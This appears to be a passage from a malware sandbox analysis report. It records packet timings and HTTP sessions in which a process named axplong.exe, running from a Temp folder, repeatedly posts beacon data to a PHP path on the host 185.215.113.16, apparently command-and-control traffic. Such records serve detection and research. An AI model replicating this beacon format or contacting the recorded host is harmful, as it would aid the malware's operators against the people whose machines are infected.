                  Sep 25, 2024 13:53:34.889616013 CEST8049764185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:34.889678001 CEST4976480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:34.890603065 CEST4976480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:34.895423889 CEST8049764185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:35.118401051 CEST8049764185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:35.118478060 CEST4976480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:35.220850945 CEST4976480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:35.221214056 CEST4976580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:35.226351023 CEST8049764185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:35.226393938 CEST8049765185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:35.226416111 CEST4976480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:35.226517916 CEST4976580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:35.226705074 CEST4976580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:07.258349895 CEST8049796185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:07.959005117 CEST8049796185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:07.959073067 CEST4979680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:08.073350906 CEST4979680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:08.079395056 CEST8049796185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:08.083467960 CEST4979680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:08.151240110 CEST4979780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:08.156338930 CEST8049797185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:08.156440020 CEST4979780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:08.157119989 CEST4979780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:08.162014961 CEST8049797185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:08.846200943 CEST8049797185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:08.846261024 CEST4979780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:08.849706888 CEST4979780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:08.850066900 CEST4979880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:08.854917049 CEST8049797185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:08.854935884 CEST8049798185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:08.854969025 CEST4979780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:08.855026960 CEST4979880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:08.855289936 CEST4979880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:08.860049963 CEST8049798185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:09.563009977 CEST8049798185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:09.563091040 CEST4979880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:09.676387072 CEST4979880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:09.676726103 CEST4979980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:09.681688070 CEST8049799185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:09.681780100 CEST4979980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:09.681865931 CEST8049798185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:09.681993008 CEST4979980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:09.682044983 CEST4979880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:09.686887980 CEST8049799185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:10.409481049 CEST8049799185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:10.409549952 CEST4979980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:10.414783001 CEST4979980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:10.415149927 CEST4980080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:10.420002937 CEST8049799185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:10.420016050 CEST8049800185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:10.420052052 CEST4979980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:10.420092106 CEST4980080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:10.420419931 CEST4980080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:10.425579071 CEST8049800185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:11.119775057 CEST8049800185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:11.119868040 CEST4980080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:11.237982988 CEST4980080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:11.238293886 CEST4980180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:11.247612953 CEST8049800185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:11.247786045 CEST4980080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:11.247909069 CEST8049801185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:11.248111963 CEST4980180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:11.248302937 CEST4980180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:11.257052898 CEST8049801185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:12.031104088 CEST8049801185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:12.031186104 CEST4980180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.033993006 CEST4980180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.034306049 CEST4980280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.039916992 CEST8049802185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:12.039952040 CEST8049801185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:12.040035009 CEST4980180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.040035009 CEST4980280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.040210962 CEST4980280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.045059919 CEST8049802185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:12.048628092 CEST4980280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.160476923 CEST4980380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.166157007 CEST8049803185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:12.166229963 CEST4980380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.166439056 CEST4980380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.171195030 CEST8049803185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:12.885569096 CEST8049803185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:12.885689974 CEST4980380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.888905048 CEST4980380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.889353037 CEST4980480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.894437075 CEST8049804185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:12.894593000 CEST4980480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.894805908 CEST4980480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.894817114 CEST8049803185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:12.895029068 CEST4980380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:12.899640083 CEST8049804185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:13.611041069 CEST8049804185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:13.613403082 CEST4980480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:13.754151106 CEST4980480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:13.754442930 CEST4980580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:13.759327888 CEST8049805185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:13.759402990 CEST8049804185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:13.759421110 CEST4980580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:13.759450912 CEST4980480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:13.759890079 CEST4980580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:13.764744997 CEST8049805185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:14.458631992 CEST8049805185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:14.461462975 CEST4980580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:14.464145899 CEST4980580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:14.464463949 CEST4980680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:14.469299078 CEST8049805185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:14.469336987 CEST8049806185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:14.469413042 CEST4980580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:14.469451904 CEST4980680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:14.469579935 CEST4980680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:14.474374056 CEST8049806185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:15.163230896 CEST8049806185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:15.165493965 CEST4980680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:15.270679951 CEST4980680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:15.271059990 CEST4980780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:15.276045084 CEST8049807185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:15.276081085 CEST8049806185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:15.276114941 CEST4980780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:15.276137114 CEST4980680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:15.276288033 CEST4980780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:15.281135082 CEST8049807185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:15.992047071 CEST8049807185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:15.992173910 CEST4980780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:15.995110035 CEST4980780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:15.995454073 CEST4980880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:16.000348091 CEST8049808185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:16.000413895 CEST4980880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:16.000536919 CEST8049807185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:16.000586987 CEST4980780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:16.000624895 CEST4980880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:16.006036043 CEST8049808185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:16.723073006 CEST8049808185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:16.725562096 CEST4980880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:16.847465038 CEST4980880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:16.847882032 CEST4980980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:16.852591038 CEST8049808185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:16.852655888 CEST4980880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:16.853416920 CEST8049809185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:16.853657007 CEST4980980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:16.853842020 CEST4980980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:16.858669043 CEST8049809185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:17.549241066 CEST8049809185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:17.549463987 CEST4980980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:17.552076101 CEST4980980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:17.552398920 CEST4981080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:17.557849884 CEST8049810185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:17.558150053 CEST8049809185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:17.558259010 CEST4980980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:17.558259010 CEST4981080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:17.558481932 CEST4981080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:17.565285921 CEST8049810185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:18.270868063 CEST8049810185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:18.270934105 CEST4981080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:18.380064964 CEST4981080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:18.380454063 CEST4981180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:18.385358095 CEST8049810185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:18.385379076 CEST8049811185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:18.385418892 CEST4981080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:18.385464907 CEST4981180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:18.385695934 CEST4981180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:18.390444994 CEST8049811185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:19.096256018 CEST8049811185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:19.096323967 CEST4981180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:19.101212025 CEST4981180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:19.101524115 CEST4981280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:19.106345892 CEST8049812185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:19.106442928 CEST4981280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:19.106465101 CEST8049811185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:19.106512070 CEST4981180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:19.106663942 CEST4981280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:19.111438990 CEST8049812185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:19.828675032 CEST8049812185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:19.828828096 CEST4981280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:19.941112995 CEST4981280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:19.941493988 CEST4981380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:19.946227074 CEST8049812185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:19.946290016 CEST4981280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:19.946320057 CEST8049813185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:19.946382999 CEST4981380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:19.946607113 CEST4981380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:19.951396942 CEST8049813185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:20.647104979 CEST8049813185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:20.647186995 CEST4981380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:20.650213003 CEST4981380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:20.650624990 CEST4981480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:20.655275106 CEST8049813185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:20.655447960 CEST8049814185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:20.655451059 CEST4981380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:20.655519962 CEST4981480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:20.655774117 CEST4981480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:20.660545111 CEST8049814185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:21.355776072 CEST8049814185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:21.355834007 CEST4981480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:21.472829103 CEST4981480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:21.473160028 CEST4981580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:21.478043079 CEST8049815185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:21.478142977 CEST4981580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:21.478235960 CEST8049814185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:21.478291988 CEST4981580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:21.478323936 CEST4981480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:21.483596087 CEST8049815185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:22.181855917 CEST8049815185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:22.181966066 CEST4981580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:22.184961081 CEST4981580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:22.185895920 CEST4981680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:22.190037012 CEST8049815185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:22.190131903 CEST4981580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:22.190710068 CEST8049816185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:22.190782070 CEST4981680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:22.192008972 CEST4981680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:22.196759939 CEST8049816185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:22.887567997 CEST8049816185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:22.887665987 CEST4981680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:23.004070044 CEST4981680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:23.004391909 CEST4981780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:23.009282112 CEST8049817185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:23.009344101 CEST4981780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:23.009463072 CEST4981780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:23.009778976 CEST8049816185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:23.009941101 CEST4981680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:23.014437914 CEST8049817185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:23.717819929 CEST8049817185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:23.717941999 CEST4981780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:23.721157074 CEST4981780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:23.721605062 CEST4981880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:23.726289034 CEST8049817185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:23.726337910 CEST4981780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:23.726363897 CEST8049818185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:23.726430893 CEST4981880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:23.726886988 CEST4981880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:23.731710911 CEST8049818185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:24.452426910 CEST8049818185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:24.452506065 CEST4981880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:24.567810059 CEST4981880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:24.568105936 CEST4981980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:24.573069096 CEST8049818185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:24.573086977 CEST8049819185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:24.573128939 CEST4981880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:24.573187113 CEST4981980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:24.574521065 CEST4981980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:24.579334974 CEST8049819185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:25.276405096 CEST8049819185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:25.276509047 CEST4981980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:25.279225111 CEST4981980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:25.279526949 CEST4982080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:25.284640074 CEST8049820185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:25.284713030 CEST4982080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:25.284742117 CEST8049819185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:25.284836054 CEST4981980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:25.285687923 CEST4982080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:25.290503979 CEST8049820185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:26.000459909 CEST8049820185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:26.000585079 CEST4982080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:26.113996029 CEST4982080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:26.114331007 CEST4982180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:26.119182110 CEST8049821185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:26.119255066 CEST4982180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:26.119307995 CEST8049820185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:26.119424105 CEST4982080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:26.119631052 CEST4982180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:54:26.124363899 CEST8049821185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:26.847058058 CEST8049821185.215.113.16192.168.2.4
                  Sep 25, 2024 13:54:26.847157955 CEST4982180192.168.2.4185.215.113.16
                  • 185.215.113.16
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.4 | 49736 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:04.673736095 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:05.373408079 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:05.375698090 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:05.603123903 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  1 | 192.168.2.4 | 49737 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:05.711065054 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:06.430521011 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:06.431566000 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:06.660629034 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  2 | 192.168.2.4 | 49738 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:06.773672104 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:07.480283976 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:07.481225014 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:07.706238031 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
